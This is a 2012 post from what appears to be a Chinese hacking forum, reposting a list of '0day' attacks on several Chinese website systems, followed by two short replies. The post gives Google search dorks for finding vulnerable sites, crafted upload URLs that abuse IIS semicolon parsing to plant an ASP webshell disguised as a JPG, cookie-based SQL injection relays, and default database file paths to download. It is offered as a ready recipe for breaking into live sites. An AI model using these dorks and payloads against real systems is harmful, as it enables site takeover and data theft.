查看: 9065|回复: 2

大家赶紧的多个0day (下)---转载

[复制链接]

该用户从未签到

发表于 2012-7-13 13:46:45 | 显示全部楼层 |阅读模式
本帖最后由 tianyueabc 于 2012-7-13 13:54 编辑

网纪互联公文签收系统司法版通杀上传漏洞
网纪互联公文签收系统司法版通杀上传漏洞
google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞文件:in_file.asp
构造语句:in_file.asp?file_name=yueyan.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/yueyan.asp;.jpg
漏洞分析:同这个0day差不多,原理相同

某新闻发布系统漏洞
无意发现一个站有注入 然后找下关键字发现是某套程序然后找了下关键字
关键字:inurl:  onews.asp?id=
有些是加入了防注入代码 但大部分都没过滤cookies 可以注入中转下。
php的注入漏洞和上传是非常好挖的,只要你在拿站是多留意下建站系统呀,getshell方法呀。。。。
多注意就会发现,有很多漏洞都是通用的。
中国是山寨大国,这些建站系统都是这个抄袭哪个,哪个抄袭这个的,瞬间无语了。,
康城公司注册类网站系统
康城公司注册类网站系统 v9.6
关键字:inurl:company.asp?title=
数据库:Databases/kangchengiop.mdb
或者Databases/kangcheng.mdb
cookies 注入中转
后台拿shell
cookies 名小子 可以上传
ewe 修改样式
数据库备份
插一句 建议不使用!!

NowShop商城系统上传0day

上传页面:admin/upload.asp
上传语句构造:admin/upload.asp?fuptype=db&fupname=yueyan.asp;&frmname=yueyan.asp
本地上传:yueyan.jpg
具体就不说明了。。。

评分

参与人数 1i币 +20 收起 理由
s0mewhat + 20

查看全部评分

回复

使用道具 举报

该用户从未签到

发表于 2012-7-18 11:31:34 | 显示全部楼层
学习中,还不知道怎么用。。
回复 支持 反对

使用道具 举报

  • TA的每日心情
    无聊
    2023-4-26 23:35
  • 签到天数: 237 天

    [LV.7]常住居民III

    发表于 2013-10-21 20:45:15 | 显示全部楼层
    支持 了、   
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-5-19 02:16 , Processed in 0.039331 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部